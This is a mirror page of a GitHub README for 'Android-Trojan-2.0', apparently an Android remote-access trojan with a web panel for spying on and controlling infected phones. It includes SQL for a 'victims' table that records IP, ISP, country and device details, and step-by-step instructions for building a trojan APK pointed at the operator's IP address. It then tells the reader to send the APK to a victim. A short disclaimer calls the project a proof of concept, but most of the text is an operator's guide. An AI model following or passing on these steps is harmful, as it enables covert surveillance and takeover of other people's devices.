Giter Site home page Giter Site logo

android-trojan-2.0's Introduction

Android-Trojan-2.0 - The Shady Upgrade

Yo folks! Welcome to the juiced-up version of Android-Trojan. We've been cooking up some spicy features for you, and we can't wait to spill the beans!

What's Cooking?

Web Magic: We've slapped on a slick web UI that lets you wrangle multiple trojans like a boss. It's like Trojan control on steroids โ€“ but legal, you know?

Android Puppetry: Not just eye candy! it lets you not only peep but also pull the strings on entire Android devices. Mind-blowing, right?

Tricky Business: We threw in some ninja moves and exploited a few things just to make this cooler than your average malware. Wanna know the secrets? Check out the code โ€“ it's like a hacker's playground.

Disclaimer: This is just a cheeky proof of concept. It's here to remind you that apps with too many permissions can be nosy neighbors. Watch your back and keep it safe out there!


Proof.mp4

How to Use

Setting Up Superbase

  1. Create a Superbase Account:

    • Head over to Superbase.
    • Create an account and grab your Superbase URL and Superbase Key.
  2. Edit .env File:

    • Locate the .env file in the SneakyTrojan directory.
    • Insert your Superbase URL and Superbase Key as instructed.
  3. Open SQL Editor in Superbase:

    • Fire up the SQL editor in Superbase.
  4. Run SQL Commands:

    • Copy and paste the following SQL commands to create necessary tables:
-- Victims Table
CREATE TABLE public.victims (
  "ID" character varying not null,
  "Country" character varying null,
  "ISP" character varying null,
  "IP" character varying null,
  "Brand" character varying null,
  "Model" character varying null,
  "Manufacture" character varying null,
  CONSTRAINT victims_pkey PRIMARY KEY ("ID")
) TABLESPACE pg_default;

-- Active User
CREATE TABLE public.activeuser (
  id BIGSERIAL PRIMARY KEY,
  username character varying null,
  password character varying null,
  name character varying null
) TABLESPACE pg_default;
  1. Enter Data in ActiveUser Table:
    • Populate the activeuser table with your login details.

Getting Ready

  1. Install Node Packages:

    • Run npm install to grab all the necessary Node packages.
  2. Android SDK:

    • Make sure you have the Android SDK installed for compiling your APK.

Unleash the Drama

  1. Run the Node App:

    • Execute node app in your terminal.
  2. Login to the UI:

    • Navigate to the provided UI link and log in using your credentials.
  3. Enter IP Address:

    • In the UI, enter your IP address in the designated text field.
  4. Hit the Download Button:

    • Click the download button and cross your fingers! If all goes well, you should get your hands on a Trojan APK.
  5. Send, Install, and Enjoy:

    • Share the Trojan APK with your victim.
    • Once installed, sit back, relax, and enjoy the drama!

android-trojan-2.0's People

Contributors

shivamsuyal avatar

Stargazers

Nabin_sharma avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.